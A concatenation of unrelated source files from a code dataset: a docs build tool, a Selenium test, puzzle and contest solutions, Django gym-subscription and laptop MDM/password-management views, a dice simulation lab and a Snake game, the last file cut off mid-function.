engine.\"\"\"\n\n # List of all template to render.\n TEMPLATE_DATA_MAP = [\n TemplateDataInfo(template=\"environments.rst_t\",\n output=\"environments.rst\",\n data_source=\"environments.yaml\")\n ]\n\n @classmethod\n def get_command_name(cls):\n return \"render-templates\"\n\n def run(self):\n tool_info = self._get_tool_info()\n\n # For each item load its data and template. 
Then render the template and\n # write the output.\n for item in self.TEMPLATE_DATA_MAP:\n print(f\"Rendering template '{item.template}' to '{item.output}' \"\n f\"using data from '{item.data_source}'.\")\n data = self._load_data(item.data_source)\n template = self._load_template(item.template)\n # TODO: Determine a better way to set the template parameter names.\n # We only have one template at the moment so this is not a bug issue\n # but would cause more problems if we added templates in the future.\n rendered_template = template.render(\n environments=data,\n tool_info=tool_info)\n self._write_output(item.output, rendered_template)\n\n def _load_data(self, data_source):\n \"\"\"Loads data from the provided data source.\n\n :param data_source: Path to the data to load.\n :return: Dictionary containing the loaded data.\n \"\"\"\n with open(os.path.join(self._source_dir, data_source)) as f:\n return yaml.safe_load(f)\n\n def _load_template(self, template):\n \"\"\"Loads the indicated template.\n\n :param template: Path to the template to load.\n :return: The loaded Jinja template.\n \"\"\"\n template_path = os.path.join(self._source_dir, template)\n with open(template_path) as template_file:\n return jinja2.Template(template_file.read(),\n undefined=jinja2.StrictUndefined)\n\n def _write_output(self, filename, output):\n \"\"\"Writes the provided output to the indicated file.\n\n Any existing files are overwritten.\n\n :param filename: Name of the file to write the data to.\n :param output: The output text to write.\n \"\"\"\n output_path = os.path.join(self._source_dir, filename)\n with open(output_path, mode='w') as output_file:\n output_file.write(output)\n\n def _get_tool_info(self):\n \"\"\"Returns information about this tool.\n\n Templates can include this information to warn editors from modifying\n the rendered output files.\n \"\"\"\n return {\"tool_name\": sys.argv[0],\n \"render_time\": datetime.datetime.now()}\n\n\ndef _get_build_tool_command_map():\n \"\"\"Searches this module for all available build tools.\n\n :return: Dictionary whose keys are the tool's command name and whose values\n are the type of command.\n :raises RuntimeError: A error is raised if two build tools try to register\n the same command name.\n \"\"\"\n # Search the current module for classes that are build tools. Their command\n # name is extracted so the name and type can be added to the returned map.\n command_map = {}\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isclass(obj) and issubclass(obj, BuildTool) \\\n and not obj == BuildTool:\n command_name = obj.get_command_name()\n if command_name in command_map:\n existing_build_tool = command_map[command_name]\n raise RuntimeError(f\"Two build tools have registered the same \"\n f\"command name of '{command_name}': \"\n f\"{obj} and {existing_build_tool}.\")\n\n command_map[obj.get_command_name()] = obj\n\n return command_map\n\n\ndef _parse_args():\n description = textwrap.dedent(\"\"\"\\\n Script that helps with the documentation build process.\n \n This includes converting converting SVG files to PDF files using inkscape\n and rendering template files.\n \"\"\")\n\n epilog = textwrap.dedent(\"\"\"\\\n build tool actions:\n convert-svg:\n Converts all SVG files to PDF files. This allows LaTeX outputs to use \n these graphics. The PDF file keeps the same basename as the SVG. 
The \n original SVGs are kept and any existing PDFs with the same name are \n overwritten.\n \n render-templates:\n Renders the templates into their output forms. This allows a single\n input file to generate multiple output files. See the \n `RenderTemplatesBuildTool` in this script's source for more details.\n \n see also:\n * inkscape\n \"\"\")\n\n parser = argparse.ArgumentParser(\n description=description,\n epilog=epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('build_tool', metavar=\"ACTION\",\n choices=_get_build_tool_command_map().keys(),\n help=\"The action to take. See below for more details.\")\n parser.add_argument('source_dir', metavar=\"SOURCE_DIR\",\n help=\"Directory containing the source files for the\"\n \"build tool to use.\")\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"fossxo/fossxo-gdd","sub_path":"build-tools.py","file_name":"build-tools.py","file_ext":"py","file_size_in_byte":8935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31666918813","text":"__author__ = 'HLTQ'\nimport unittest\nfrom selenium import webdriver\nfrom test_program.common.logger import Logger\nfrom test_program.common.em_Login import Login\nfrom test_program.common.em_LogOut import LogOut\nimport logging\nimport time\n\n\nclass LoginEm(unittest.TestCase):\n def setUp(self):\n try:\n self.driver = webdriver.Firefox()\n self.lg = Logger(\"C:/Users/HLZC/PycharmProjects/TQtest/test_program/logs\" + \"/Test_LoginEm.log\",\n flevel=logging.INFO)\n\n except:\n\n self.lg.logger.error(\"启动浏览器失败!\")\n\n\n def test_login(self):\n self.lg.info(\"启动浏览器成功!\")\n self.login_em = Login(self.driver, url=\"http://192.168.10.131:8000/EM\")\n self.login_em.go_LoginPage()\n self.login_em.login(\"00337\", \"123\")\n self.lg.info(\"wait 2s.\")\n time.sleep(2)\n self.driver.refresh()\n self.lg.info(\"refresh\")\n\n\n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__mian__\":\n unittest.main()\n\n\n","repo_name":"tiansimi/web_auto_program","sub_path":"test_program/testcases/login_EM.py","file_name":"login_EM.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20065992538","text":"# As the submarine drops below the surface of the ocean, it automatically performs a sonar sweep of the nearby sea floor. On a small screen, the sonar sweep report (your puzzle input) appears: each line is a measurement of the sea floor depth as the sweep looks further and further away from the submarine.\n\n# For example, suppose you had the following report:\n\n# 199\n# 200\n# 208\n# 210\n# 200\n# 207\n# 240\n# 269\n# 260\n# 263\n# This report indicates that, scanning outward from the submarine, the sonar sweep found depths of 199, 200, 208, 210, and so on.\n\n# The first order of business is to figure out how quickly the depth increases, just so you know what you're dealing with - you never know if the keys will get carried into deeper water by an ocean current or a fish or something.\n\n# To do this, count the number of times a depth measurement increases from the previous measurement. (There is no measurement before the first measurement.) 
In the example above, the changes are as follows:\n\n# 199 (N/A - no previous measurement)\n# 200 (increased)\n# 208 (increased)\n# 210 (increased)\n# 200 (decreased)\n# 207 (increased)\n# 240 (increased)\n# 269 (increased)\n# 260 (decreased)\n# 263 (increased)\n# In this example, there are 7 measurements that are larger than the previous measurement.\n\nfrom os import write\n\n# Turn into an array?\nwindows = [None,None,None,None]\nsignal_count = 0\nwindow_length = 3\nlast_closed_window_total = None\n\nwith open('day1-input.txt') as f:\n total_window_increases = 0\n for line in f:\n signal = int(line)\n\n wid = signal_count % (4)\n\n if wid == 0:\n # open window 0\n windows[0] = signal\n # close window 2\n if windows[2] != None:\n windows[2] += signal\n if (last_closed_window_total != None) and (windows[2] > last_closed_window_total):\n total_window_increases += 1\n if last_closed_window_total != None:\n last_closed_window_total = windows[2]\n \n windows[2] = None\n # increment window 3\n if windows[3] != None:\n windows[3] += signal\n elif wid == 1:\n # open window 1\n windows[1] = signal\n # close window 3\n if windows[3] != None:\n windows[3] += signal\n if (last_closed_window_total != None) and (windows[3] > last_closed_window_total):\n total_window_increases += 1\n last_closed_window_total = windows[3]\n windows[3] = None\n # increment window 0\n if windows[0] != None:\n windows[0] += signal\n elif wid == 2:\n # open window 2\n windows[2] = signal\n # close window 0\n if windows[0] != None:\n windows[0] += signal\n if (last_closed_window_total != None) and (windows[0] > last_closed_window_total):\n total_window_increases += 1\n last_closed_window_total = windows[0]\n windows[0] = None\n # increment window 1\n if windows[1] != None:\n windows[1] += signal\n else:\n # open window 3\n windows[3] = signal\n # close window 1\n if windows[1] != None:\n windows[1] += signal\n if (last_closed_window_total != None) and (windows[1] > last_closed_window_total):\n total_window_increases += 1\n last_closed_window_total = windows[1]\n windows[1] = None\n # increment window 2\n if windows[2] != None:\n windows[2] += signal\n \n signal_count += 1\n #TODO: parameterize this stupid logic\n #TODO: consider doing the first window outside the main logic to skip all the dumb checks.\n #TODO: optional trickiness - do this w/o a separate variable by using the list value\n\n print(total_window_increases)\n\n\n # Problem 1 solution\n # current = int(line)\n # if prev != None and current > prev:\n # count += 1\n # prev = current\n\n # print(count)","repo_name":"ChrisGwinn/adventofcode2021","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74693405066","text":"memo = [([-1] * 190) for i in range(1, 190)]\nmemo2 = []\nfor j in range(0, 190):\n\tmemo2.append([([-1] * 190) for i in range(1, 190)])\nmemo3 = [([-1] * 190) for i in range(1, 190)]\n\ndef ch(n, p):\n\tif p > n or p < 0:\n\t\treturn 0\n\tif n == 0:\n\t\treturn 1\n\tif memo3[n][p] != -1:\n\t\treturn memo3[n][p]\n\tr = ch(n - 1, p) + ch(n - 1, p - 1)\n\tmemo3[n][p] = r\n\treturn r\n\ndef choose(n, sz, left):\n\tif left == 0:\n\t\treturn int(n == 0)\n\tif left > sz:\n\t\treturn 0\n\tif memo2[n][sz][left] != -1:\n\t\treturn memo2[n][sz][left]\n\tr = 0\n\tfor x in range(1, n + 1):\n\t\tr += ch(n - 1, x - 1) * choose(n - x, sz, left - 1) * pd(x - 1, sz)\n\tmemo2[n][sz][left] = r\n\t#print(\"choose(%d, %d, %d) = 
%d\" % (n, sz, left, r))\n\treturn r\n\ndef pd(n, mx):\n\tif n == 0:\n\t\treturn 1\n\tif memo[n][mx] != -1:\n\t\treturn memo[n][mx]\n\tr = 0\n\tfor sz in range(1, mx + 1):\n\t\tr += choose(n, sz, sz)\n\tmemo[n][mx] = r\n\t#print(\"pd(%d, %d) = %d\" % (n, mx, r))\n\treturn r\n\nimport sys\n\nfor i in range(1, 151):\n\tprint('\"' + str(pd(i - 1, i - 1)) + '\",')\n\tsys.stderr.write(str(i) + \"\\n\")\n","repo_name":"yancouto/competitive-programming","sub_path":"contests/asc33/E/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"21641488047","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response, redirect\n\nfrom django.core.context_processors import csrf\n\nfrom database.args import create_args\n\nfrom setup.models import Settings\n\n# Abonementi\nfrom subscriptions.models import *\n\n# Skapji\nfrom lockers.models import Skapji, Skapji_history\n\n# Klienta modelis\nfrom clients.models import Klienti\n\nfrom datetime import timedelta, datetime, date, time\n\n\ndef max_date(cli):\n subscriptions = Abonementi.objects.filter( client = cli, ended = False )\n activate_before_dates = []\n best_before_dates = []\n\n # savāc datumus\n for s in subscriptions:\n if s.active:\n best_before_dates.append( s.best_before )\n else:\n if isinstance( s.activate_before, datetime ) == True:\n activate_before_dates.append( s.activate_before )\n\n # nosaka max datumus AKTIVĒT LĪDZ\n if len( activate_before_dates ) > 1:\n max_activate = max(activate_before_dates)\n elif len( activate_before_dates ) == 1:\n max_activate = activate_before_dates[0]\n else:\n max_activate = []\n\n # nosaka max datumus DERĪGS LĪDZ\n if len( best_before_dates ) > 1:\n max_best_before = max(best_before_dates)\n elif len( best_before_dates ) == 1:\n max_best_before = best_before_dates[0]\n else:\n max_best_before = []\n\n # saliek max_1 un max_2\n max_dates = []\n if isinstance( max_activate, datetime ) == True:\n max_dates.append(max_activate)\n if isinstance( max_best_before, datetime ) == True:\n max_dates.append(max_best_before)\n\n # meklē jaunāko ja ir...\n if len( max_dates ) > 1:\n max_date = max(max_dates)\n elif len( max_dates ) == 1:\n max_date = max_dates[0]\n else:\n max_date = []\n\n return max_date\n\n\n\n#============================================================\n# !!!!! 
ABONEMENTA IESLADĒŠANA !!!!!\ndef subscription_freeze(request):\n args = create_args(request)\n if args['access'] == False:\n return redirect (Settings.objects.get( key = \"access denied redirect\" ).value)\n\n if args['loged_in'] == False:\n return redirect(\"/login/\")\n\n args.update(csrf(request)) # ADD CSRF TOKEN\n\n # Get Active client from COOKIE\n if \"active_client\" in request.COOKIES:\n# if True:\n try:\n c_id = int(request.COOKIES.get(str('active_client')))\n cli = Klienti.objects.get( id = c_id )\n\n # POST\n if request.POST:\n args['today'] = (datetime.now() - timedelta(days=3)).date()\n max_d = max_date( cli )\n args['max_date'] = max_d\n\n args['client'] = cli\n\n f_start_str = request.POST.get('freeze_start', '')\n f_end_str = request.POST.get('freeze_end', '')\n\n # convert dates from string to datetime\n date_error = False\n try:\n f_start_date = datetime.strptime( f_start_str, '%Y-%m-%d')\n except:\n args['start_error'] = True\n date_error = True\n try:\n f_end_date = datetime.strptime( f_end_str, '%Y-%m-%d')\n except:\n args['end_error'] = True\n date_error = True\n\n # dates error\n if date_error == True:\n return render_to_response ( 'subscription_freeze.html', args )\n\n if f_end_date.date() > max_d.date(): #(max_date( cli ) + timedelta(days=1)).date:\n args['end_limit'] = True\n return render_to_response ( 'subscription_freeze.html', args )\n\n # Client in the club error\n if f_start_date.date() <= date.today() and f_end_date.date() >= date.today():\n # Check if client is in club at this moment\n try:\n c_l = Skapji.objects.get( client = cli )\n args['client_in_club'] = True\n return render_to_response ( 'subscription_freeze.html', args )\n except:\n pass\n\n # Check if client has been in club today\n try:\n date_min = datetime.combine(f_start_date.date(), time.min)\n today_max = datetime.combine(date.today(), time.max)\n c_l = Skapji_history.objects.filter( client = cli, checkin_time__range=(date_min, today_max) )\n if c_l.count() > 0:\n args['client_was_in_club'] = True\n return render_to_response ( 'subscription_freeze.html', args )\n except:\n pass\n\n d = (f_end_date - f_start_date).days + 1\n args['days'] = d\n\n # !!!!! freeze process !!!!!\n subscr = Abonementi.objects.filter( client = cli, ended = False )\n\n # freeze client\n cli.frozen_from = f_start_date.date()\n cli.frozen_until = f_end_date.date()\n if cli.frozen_from <= date.today():\n cli.frozen = True\n cli.save()\n\n for s in subscr:\n if s.active:\n new_freeze = Abonementu_Iesalde( user=args['username'], client=cli, subscr=s, best_before=s.best_before,\n freeze_from=f_start_date.date(), freeze_until=f_end_date.date() )\n new_freeze.save()\n s.best_before = s.best_before + timedelta(days = d)\n else:\n new_freeze = Abonementu_Iesalde( user=args['username'], client=cli, subscr=s, activate_before=s.activate_before,\n freeze_from=f_start_date.date(), freeze_until=f_end_date.date() )\n new_freeze.save()\n s.activate_before = s.activate_before + timedelta(days=d)\n s.save()\n\n # GET\n else:\n args['today'] = (datetime.now() - timedelta(days=3)).date()\n args['max_date'] = max_date( cli )\n args['client'] = cli\n except:\n pass\n return render_to_response ( 'subscription_freeze.html', args )\n\n\n#============================================================\n# !!!!! 
CANCEL SUBSCRIPTION FREEZE !!!!!\ndef subscription_unfreeze(request):\n args = create_args(request)\n if args['access'] == False:\n return redirect (Settings.objects.get( key = \"access denied redirect\" ).value)\n\n if args['loged_in'] == False:\n return redirect(\"/login/\")\n\n # Get Active client from COOKIE\n if \"active_client\" in request.COOKIES:\n if True:\n# try:\n c_id = int(request.COOKIES.get(str('active_client')))\n cli = Klienti.objects.get( id = c_id )\n\n # Unfreeze Klienti object\n cli.frozen = False\n cli.frozen_from = None\n cli.frozen_until = None\n cli.save()\n\n # today\n today = date.today()\n\n # Return dates to initial\n freeze = Abonementu_Iesalde.objects.filter( client=cli )\n\n for f in freeze:\n if f.freeze_from <= today and f.freeze_until >= today:\n# return redirect (\"/client/new/\")\n if f.subscr.active:\n f.subscr.best_before = f.best_before\n else:\n f.subscr.activate_before = f.activate_before\n f.subscr.save()\n f.delete()\n# except:\n# pass\n return redirect (\"/\")\n","repo_name":"svabis/db","sub_path":"subscriptions/views/freeze.py","file_name":"freeze.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38795351646","text":"import random\n\n\n# Input parameters - p_bonus - represents the bonus to the roll (integer)\n# Returns - Number of dead raised\n# Description - Simulates rolling a 20-sided dice to decide if Atwood successfully calls animate_dead.\n# If she rolls 5 or under, she will raise zero undead.\n# Otherwise, she raises the number of undead equal to (roll + p_bonus)\n# Example 1: p_bonus = 4. Necromancer Atwood rolls 8 on a 20 sided dice. She raises 12 undead.\n# return 12.\n# Example 2: p_bonus = -4. Necromancer Atwood rolls 8 on a 20 sided dice.\n# 8 - 4 < 5 and she raises 0 undead. return 0.\ndef animate_dead(p_bonus):\n roll = random.randint(1, 20)\n roll_plus_bonus = roll + p_bonus\n if roll_plus_bonus < 5:\n return 0\n else:\n return roll_plus_bonus\n\n\n# Input parameters - none\n# Returns - A list representing the number of controlled and uncontrolled undead\n# # list[0] is controlled list[1] is uncontrolled.\n# Description - Calls animate_dead function for each cemetery Necromancer Atwood visits\n# She will visit central burying ground, granary burying ground, King's chapel burying ground\n# - Each burying ground has different bonuses to raising the dead.\n# Central Burying Ground - keep her winning chance unchanged.\n# Granary Burying Ground - Give her a +2 chance to raise the dead. A bard friend gave her a bonus.\n# King's Chapel Burying Ground - Give her a -2 chance to raise the dead. John Winthrop isn't here for it.\n# - Immediately after calling animate_dead,\n# there is a 25% chance she will lose control of the dead she just raised for that burying ground.\n# - If she raises dead (or raises 0) and keeps control of them, print out\n# \"Necromancer Atwood raised XXX undead in \"\n# - If she raises dead and loses control of them, print out\n# \"Necromancer Atwood raised x undead in but loses control of them\"\n# - update the undead_data list\n# - At the end, Necromancer Atwood can only control 20 undead for long enough to do the dance.\n# At the end, any number of controlled undead become controlled.\n# Calculate if any of the controlled dead become uncontrolled. If so, prints out\n# \"Necromancer Atwood can't control that many undead! 
x become uncontrolled\" and update list.def raise\n# _army():\n\ndef raise_army():\n undead = animate_dead(0)\n undead_data = [0, 0]\n roll = random.randint(1, 4)\n if roll < 4:\n undead_data[0] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Central Burying Ground\")\n else:\n undead_data[1] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Central Burying Ground, \"\n \"but loses control of them.\")\n\n undead = animate_dead(2)\n roll = random.randint(1, 4)\n if roll < 4:\n undead_data[0] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Granary Burying Ground\")\n else:\n undead_data[1] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Granary Burying Ground, \"\n \"but loses control of them.\")\n\n undead = animate_dead(-2)\n roll = random.randint(1, 4)\n if roll < 4:\n undead_data[0] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in King's chapel Burying Ground\")\n else:\n undead_data[1] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in King's chapel Burying Ground, \"\n \"but loses control of them.\")\n\n if undead_data[0] > 20:\n undead_data[1] += undead_data[0] - 20\n undead_data[0] = 20\n\n return undead_data\n\n# Input - list of integers that represents each possible outcome.\n# Returns - list of integers that represents each possible outcome.\n# Description - calls raise_army and determines the result\n# sim_data[0] = Atwood gets dance party, but undead take over Boston common.\n# sim_data[1] = Atwood gets dance party, and not enough undead take over Boston common.\n# sim_data[2] = Atwood does not get dance party, but undead take over Boston common.\n# sim_data[3] = Atwood does not get dance party, and not enough undead take over Boston common.\n# Scores are kept similar to College chooser\n# The autograder will look for the following strings:\n# \"Dance party\" for Necromancer Atwood getting dance party (enough controlled undead)\n# \"No dance party\" for Necromancer Atwood not getting dance party (not enough controlled undead)\n# \"Taking over Boston common\" for enough uncontrolled undead to take over Boston common\n# \"Not taking over Boston common\" for not enough uncontrolled undead taking over Boston common\n# capitalization does not matter\n\n\ndef dance(p_sim_data):\n\n undead_data = raise_army()\n controlled = undead_data[0]\n uncontrolled = undead_data[1]\n\n print(undead_data)\n if controlled > 10:\n print(\"Necromancer Atwood raised enough dead for the flash mob. Yay Dance party!\")\n else:\n print(\"Necromancer Atwood did not raise enough dead for the flash mob dance party. No Dance party.\")\n if uncontrolled > 10:\n print(\"The uncontrolled undead are too much. Oh no undead taking over Boston common!\")\n else:\n print(\"The uncontrolled undead are not taking over Boston common.\")\n\n if controlled > 10:\n if uncontrolled > 10:\n p_sim_data[0] += 1\n else:\n p_sim_data[1] += 1\n else:\n if uncontrolled > 10:\n p_sim_data[2] += 1\n else:\n p_sim_data[3] += 1\n return p_sim_data\n\n# Input - list of integers, integers. list represents number of tournament wins. 
int represents the number of times\n# the simulation ran\n# Output - none\n# Description - prints how many tournaments and Grand Slams Serena won and her win percentage\n\n\ndef data_analysis(p_sim_data, p_num_simulations):\n\n print(\"\\n\\n\\nAn undead army dances Thriller while another overtakes Boston Common \" + str(p_sim_data[0]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. \" +\n str(int(p_sim_data[0]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n\n print(\"An undead army dances Thriller \" + str(p_sim_data[1]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. Yay! \" +\n str(int(p_sim_data[1]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n print(\"Necromancer Atwood does not get her dance party, but an uncontrolled undead army takes over Boston Common.\"\n \" Oops. \\nThis event happens \" +\n str(p_sim_data[2]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. \" +\n str(int(p_sim_data[2]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n\n print(\"No dance party, no undead takeover. It\\'s like nothing happened \" + str(p_sim_data[3]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. \" +\n str(int(p_sim_data[3]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n\n\n# Input - list of integers, float. list represents number of tournament wins.\n# Output - list of integers that represents the various outcomes for Necromancer Atwood\n# Description - calls dance the number of times the simulation needs to run and then calls data_analysis\ndef run_simulation(p_num_simulations):\n sim_data = [0, 0, 0, 0]\n for index in range(p_num_simulations):\n print(\"Simulation \" + str(index + 1) + \":\")\n sim_data = dance(sim_data)\n # call data_analysis after all the seasons are simulated\n data_analysis(sim_data, p_num_simulations)\n return sim_data\n\n\nnum_simulations = int(input(\"How many times to run simulation? 
\"))\nsimulation_data = run_simulation(num_simulations)\n\n# This is a fake help from martians\n","repo_name":"Derp7777/CRLS_APCSP_autograder","sub_path":"app/scratch_labs/2019_ewu_4.026.py","file_name":"2019_ewu_4.026.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14141668430","text":"from turtle import Screen\nfrom snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\nimport time\nscreen = Screen()\nscreen.setup(1000, 1000)\nscreen.bgcolor(\"black\")\nscreen.title(\"Snake Game\")\nscreen.tracer(0)\n\nsnake = Snake()\nfood = Food()\nscoreboard = Scoreboard(0, 465)\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")\nscreen.onkey(snake.down, \"Down\")\nscreen.onkey(snake.left, \"Left\")\nscreen.onkey(snake.right, \"Right\")\n\ntimes = 0.1\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(times)\n snake.move()\n print(snake.head.xcor())\n num = 0\n for x in snake.segments:\n food.cors_seg_of_snake[num] = (x.xcor(), x.ycor())\n num += 1\n scoreboard.update_score()\n if snake.head.distance(food) < 17:\n snake.eat()\n food.add_seg_of_snake((snake.segments[len(snake.segments)-1].xcor(),\n snake.segments[len(snake.segments)-1].ycor()))\n food.refresh()\n if times > 0.05:\n times -= 0.005\n scoreboard.increase_score()\n if snake.head.xcor() > 490 or snake.head.xcor() < -495 or snake.head.ycor() > 495 or snake.head.ycor() < -490:\n times = 0.1\n snake.reset()\n scoreboard.reset()\n for seg in snake.segments[2:]:\n if snake.head.distance(seg) < 10:\n times = 0.1\n snake.reset()\n scoreboard.reset()\n\nscreen.exitonclick()\n","repo_name":"gajewskikamil/Snake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19119491904","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom hashlib import sha256\nfrom itertools import chain\nimport json, os, datetime, uuid, pytz, plistlib\n\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.http import JsonResponse, HttpResponse, FileResponse, Http404, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render, reverse\nfrom django.template import loader\nfrom django.utils import timezone\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.views.decorators.cache import never_cache\n\nfrom .models import Laptop, LaptopPasswordRetrieval, LaptopPasswordRotation, ConfigurationProfile, InstallationRecord, \\\n MacOSApp\nfrom .forms import ProfileForm, EnrollmentForm, RemovalForm, ClientForm, AssignmentForm, ProfileRemovalForm, \\\n NewAppForm, UpdateAppForm, UninstallAppForm, AppMergeForm\nfrom emails.generators import GenericEmailGenerator\n\n\n@login_required\n@require_GET\n@permission_required('devices.view_laptop', raise_exception=True)\ndef laptops_list(request):\n \"\"\"View a list of LNL's laptops\"\"\"\n laptops = Laptop.objects.filter(retired=False)\n return render(request, 'laptops/laptops_list.html', {\"laptops\": 
laptops})\n\n\n@login_required\n@require_GET\n@permission_required('devices.view_laptop_history', raise_exception=True)\ndef laptop_history(request, id):\n \"\"\"\n View a history of password retrievals and rotations for a given laptop\n\n :param id: Primary key of laptop\n \"\"\"\n laptop = get_object_or_404(Laptop, retired=False, pk=id)\n password_retrievals = laptop.password_retrievals.all()\n password_rotations = laptop.password_rotations.all()\n events = sorted(\n chain(\n (('retrieval', r) for r in password_retrievals),\n (('rotation', r) for r in password_rotations)\n ), key=lambda event: event[1].timestamp, reverse=True)\n return render(request, 'laptops/laptop_history.html', {'laptop': laptop, 'events': events})\n\n\n@login_required\n@require_GET\ndef laptop_user_password(request, id):\n \"\"\"\n Retrieve the LNL user password for one of the laptops\n\n :param id: Primary key of laptop\n \"\"\"\n laptop = get_object_or_404(Laptop, retired=False, pk=id)\n if not request.user.has_perm('devices.retrieve_user_password', laptop):\n raise PermissionDenied\n LaptopPasswordRetrieval.objects.create(laptop=laptop, user=request.user, admin=False)\n context = {\n 'title': 'Password for {}'.format(laptop.name),\n 'password': laptop.user_password,\n 'now': timezone.now()\n }\n return render(request, 'laptops/password.html', context)\n\n\n@login_required\n@require_GET\ndef laptop_admin_password(request, id):\n \"\"\"\n Retrieve the admin password for one of the laptops\n\n :param id: Primary key of laptop\n \"\"\"\n laptop = get_object_or_404(Laptop, retired=False, pk=id)\n if not request.user.has_perm('devices.retrieve_admin_password', laptop):\n raise PermissionDenied\n LaptopPasswordRetrieval.objects.create(laptop=laptop, user=request.user, admin=True)\n context = {\n 'title': 'Admin Password for {}'.format(laptop.name),\n 'password': laptop.admin_password,\n 'now': timezone.now()\n }\n return render(request, 'laptops/password.html', context)\n\n\n@require_POST\n@csrf_exempt\ndef rotate_passwords(request):\n \"\"\"\n Endpoint for updating the MacBook passwords once they've been rotated.\n\n :returns: The old passwords so the MacBooks can complete the rotation\n \"\"\"\n data = json.loads(request.body)\n laptop = get_object_or_404(Laptop, retired=False, api_key_hash=sha256(data['apiKey'].encode('utf-8')).hexdigest())\n response_data = {\"oldUserPassword\": laptop.user_password, \"oldAdminPassword\": laptop.admin_password}\n laptop.user_password = data['userPassword']\n laptop.admin_password = data['adminPassword']\n laptop.save()\n LaptopPasswordRotation.objects.create(laptop=laptop)\n return JsonResponse(response_data)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef mdm_list(request):\n \"\"\"MDM Console Homepage\"\"\"\n laptops = Laptop.objects.filter(retired=False)\n return render(request, 'mdm/mdm_list.html', {'laptops': laptops})\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef install_client(request):\n \"\"\"Displays an agreement that the user must agree to before they can download the MDM Client installer\"\"\"\n context = {}\n if request.method == 'POST':\n form = ClientForm(request.POST)\n if form.is_valid():\n installer = os.path.join(settings.MEDIA_ROOT, \"software\", \"mdm\", \"client_installer.dmg\")\n if os.path.exists(installer):\n with open(installer, 'rb') as f:\n response = HttpResponse(f.read(), content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; 
filename=LNL MDM.dmg'\n return response\n messages.add_message(request, messages.WARNING, \"Hmm, we couldn't seem to find the installer. Please try \"\n \"again later.\")\n context['form'] = form\n else:\n context['form'] = form\n else:\n context['form'] = ClientForm()\n context['msg'] = \"New Managed Device\"\n return render(request, 'form_crispy.html', context)\n\n\n@require_POST\n@csrf_exempt\ndef mdm_enroll(request):\n \"\"\"\n Endpoint for starting the enrollment process. Must be contacted directly by the device being enrolled.\n\n :returns: Relative path to the link to complete the enrollment process (if client token is valid)\n \"\"\"\n data = json.loads(request.body)\n if data['token'] == settings.MDM_TOKEN:\n try:\n laptop = Laptop.objects.all().get(api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest())\n except Laptop.DoesNotExist:\n laptop = Laptop.objects.all().create(api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest(),\n name=data['hostname'], user_password=\"None\", admin_password=\"None\")\n laptop.serial = data['serial']\n laptop.last_ip = data['networkIP']\n laptop.save()\n response = {'next': reverse(\"mdm:enroll\", args=[laptop.pk])}\n else:\n response = {'next': reverse(\"mdm:enroll\", args=[0])}\n return JsonResponse(response)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef complete_enrollment(request, pk):\n \"\"\"\n Launched once the installation process is completed on a new device. Prompts the user for additional administrative\n details such as the asset tag number to complete the enrollment process.\n\n :param pk: Primary key of device\n \"\"\"\n context = {}\n if str(pk) == '0':\n raise PermissionDenied\n try:\n laptop = Laptop.objects.all().get(pk=pk, serial__isnull=False, mdm_enrolled=False)\n except Laptop.DoesNotExist:\n response = render(request, '404.html', {'status': 'Error',\n 'error_message': 'Unable to enroll device. May already be enrolled.'})\n response.status_code = 404\n return response\n if request.method == 'POST':\n form = EnrollmentForm(request.POST)\n if form.is_valid() and 